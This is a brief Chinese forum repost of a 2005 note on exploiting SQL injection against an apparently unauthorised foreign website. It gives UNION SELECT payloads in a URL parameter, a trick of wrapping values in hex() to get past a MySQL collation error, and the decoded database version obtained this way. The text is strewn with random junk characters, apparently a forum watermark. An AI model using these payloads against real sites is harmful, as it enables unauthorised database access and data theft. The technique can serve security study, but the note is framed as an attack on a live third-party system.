本文作者:SuperHei
, B' u. G# ~0 Y" k. D$ ~+ _文章性质:原创0 G6 D- B& C( E0 o
发布日期:2005-10-18
1 t: E, N0 w3 d$ ]+ w测试个国外的站时:
( ^! L0 V3 r0 @4 j. ~; n% [url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*! S/ ^0 _$ X+ q
返回错误:0 V O5 s- R5 y) m
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'$ Y; @& p. T7 [% F4 B( T
MySQL Error No. 126
% N; _, B' D$ q4 }5 s看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
4 L9 n" d2 Q4 E% M' z+ {8 l解决办法:转为其他编码如hex。' T4 [7 O! i' i2 O2 Q7 W8 H
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*/ B" D* k5 u2 p9 o
成功得到hex(version())的值为:- l: n! f- _4 e5 s7 Z1 k! }2 }; t
342E312E332D62657461
+ i: S# H$ M: e3 ]回Mysql查询下得到:
* v/ o( O- y) {) h( D1 h0 Imysql> select 0x342E312E332D62657461;" p3 h( r B8 T
+------------------------+
" N' B9 D/ T0 y: ]2 R| 0x342E312E332D62657461 |9 T7 n8 x$ v( q& M, K
+------------------------+* p5 l7 A3 a9 ?" N6 m W
| 4.1.3-beta |2 ^/ [ F% x7 \8 w! n, d7 |
+------------------------+
0 _' o5 i8 R8 f+ o1 row in set (0.00 sec)% M7 o4 k6 ]+ L3 D
! |8 c9 s- T2 w4 K4 a2 Q |
发表于 2012-9-15 14:04:54
收藏
支持
反对